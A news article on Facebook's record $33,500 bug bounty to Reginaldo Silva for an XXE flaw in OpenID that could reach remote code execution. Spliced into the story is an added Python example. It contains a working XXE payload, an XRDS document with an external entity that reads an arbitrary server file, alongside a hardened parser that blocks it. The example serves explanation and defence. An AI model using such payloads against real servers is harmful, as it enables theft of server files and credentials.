Facebook has announced that it has awarded $33,500, its biggest bug bounty payout to date, to a Brazilian security researcher who discovered a remote code execution flaw affecting Facebook's servers.

Reginaldo Silva initially reported to the company his discovery of an XML external entity (XXE) vulnerability that allowed attackers to read arbitrary files from the affected web server.

That report was made in November 2013, but he had found the bug about a year earlier while examining how Drupal handled OpenID. It took him a year to realize that the same flaw could affect other services using the popular authentication standard, at which point he began testing them.
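The mechanism behind the bug, as an added example that is not part of the article and not Silva's proof of concept: OpenID 2.0 discovery fetches an XRDS (XML) document from the identifier URL the user supplies, so the user controls the document the relying party parses. If that parser resolves external general entities, a DOCTYPE in the document turns the `<URI>` field into the contents of any file the server can read. The code below uses Python's standard-library SAX parser to show the vulnerable configuration beside a hardened one (external entities off, any DOCTYPE rejected). The XRDS documents, the handler, and the temporary file standing in for a sensitive file are all constructed for the demo; nothing here reflects which parser or settings Facebook actually used.

```python
"""Added example for this article: an OpenID relying party's XRDS parser
turned into a file reader (XXE), beside the settings that close it.

Illustrative code only: not Silva's proof of concept and not Facebook's
or Drupal's OpenID code.  Uses the stdlib expat-backed SAX parser; the
XRDS documents and the "secret" file are constructed for the demo.
"""
import io
import os
import tempfile
import xml.sax
from xml.sax.handler import feature_external_ges, property_lexical_handler

# What a benign OpenID provider publishes at the identifier URL
# (constructed sample).  The relying party reads the endpoint from <URI>.
XRDS_BENIGN = b"""<?xml version="1.0" encoding="UTF-8"?>
<xrds:XRDS xmlns:xrds="xri://$xrds" xmlns="xri://$xrd*($v*2.0)">
  <XRD>
    <Service priority="0">
      <Type>http://specs.openid.net/auth/2.0/signon</Type>
      <URI>https://openid.example.test/server</URI>
    </Service>
  </XRD>
</xrds:XRDS>
"""

# Same document with a DOCTYPE declaring an external entity.  The attacker
# controls the identifier URL, so they control this document; %s is the
# path of the file they want to read.
XRDS_XXE_TEMPLATE = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE xrds:XRDS [ <!ENTITY xxe SYSTEM "%s"> ]>
<xrds:XRDS xmlns:xrds="xri://$xrds" xmlns="xri://$xrd*($v*2.0)">
  <XRD>
    <Service priority="0">
      <Type>http://specs.openid.net/auth/2.0/signon</Type>
      <URI>&xxe;</URI>
    </Service>
  </XRD>
</xrds:XRDS>
"""


class XRDSHandler(xml.sax.ContentHandler):
    """Collects the text of every <URI> element (a toy discovery step)."""

    def __init__(self):
        super().__init__()
        self.uris = []
        self._buf = None

    def startElement(self, name, attrs):
        if name == "URI":
            self._buf = []

    def characters(self, content):
        if self._buf is not None:
            self._buf.append(content)

    def endElement(self, name):
        if name == "URI":
            self.uris.append("".join(self._buf).strip())
            self._buf = None


class DTDForbidden(ValueError):
    """Raised when a document carries a DOCTYPE; XRDS never needs one."""


class RejectDTD:
    """Minimal SAX lexical handler: abort as soon as a DOCTYPE appears."""

    def startDTD(self, name, public_id, system_id):
        raise DTDForbidden(f"DOCTYPE {name!r} not allowed in XRDS")

    # Remaining lexical events are irrelevant here but must exist.
    def endDTD(self): pass
    def comment(self, content): pass
    def startCDATA(self): pass
    def endCDATA(self): pass


def parse_xrds(document: bytes, hardened: bool) -> list:
    """Return the <URI> values of an XRDS document.

    hardened=False mimics a parser that resolves external general
    entities (the vulnerable configuration).  hardened=True turns that
    off and additionally refuses any DOCTYPE before it is processed.
    """
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, not hardened)
    if hardened:
        parser.setProperty(property_lexical_handler, RejectDTD())
    handler = XRDSHandler()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(document))
    return handler.uris


def demo() -> dict:
    """Plant a stand-in secret file, then parse the attacker's XRDS both ways."""
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as f:
        f.write("s3cr3t-db-password\n")   # constructed stand-in for a real secret
        secret_path = f.name
    try:
        evil = XRDS_XXE_TEMPLATE % secret_path.encode()
        leaked = parse_xrds(evil, hardened=False)   # file contents land in <URI>
        try:
            parse_xrds(evil, hardened=True)
            blocked = False
        except DTDForbidden:
            blocked = True
        benign = parse_xrds(XRDS_BENIGN, hardened=True)  # normal documents still work
    finally:
        os.unlink(secret_path)
    return {"leaked": leaked, "blocked": blocked, "benign": benign}


if __name__ == "__main__":
    print(demo())
```

Python 3.7.1 and later already default `feature_external_ges` to off, which is why the demo enables it explicitly; older interpreters and many other XML stacks resolve external entities unless told not to. Rejecting the DOCTYPE outright is the stronger fix, since XRDS has no legitimate use for one and it also stops entity-expansion (billion laughs) denial of service.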

Once he discovered that Facebook was also vulnerable, he submitted his findings and PoC exploit code to the company's security team.

"The report was well written and included proof of concept code, so we were able to reproduce the issue easily. After running the proof of concept to verify the issue, we filed an urgent task—triggering notifications to our on-call employees," the team explained in a post.

A short-term fix was produced in less than four hours and immediately deployed across the company's web servers. Silva was notified, but was disappointed: he believed the bug could be escalated to remote code execution, but with the fix in place he could no longer prove it.

"I decided to tell the security team what I'd do to escalate my access and trust them to be honest when they tested to see if the attack I had in my mind worked or not," he wrote. "I'm glad I did that. After a few back and forth emails, the security team confirmed that my attack was sound and that I had indeed found a RCE affecting their servers."

"We knew we wanted to pay out a lot because of the severity of the issue, so we decided to average the payout recommendations across a group of our program administrators," the team concluded. With Silva's permission, they also made the size of his award public.
